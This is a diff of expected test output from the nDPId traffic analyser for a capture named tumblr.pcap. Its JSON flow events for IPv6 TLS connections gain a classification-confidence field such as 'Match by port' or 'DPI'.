+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}}
-00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}}
+00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49496,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":49546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605292122064,"flow_last_seen":1605292122440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6040,"flow_tot_l4_payload_len":76219,"flow_avg_l4_payload_len":712,"midstream":0,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605292104650,"flow_last_seen":1605292122733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292119370,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
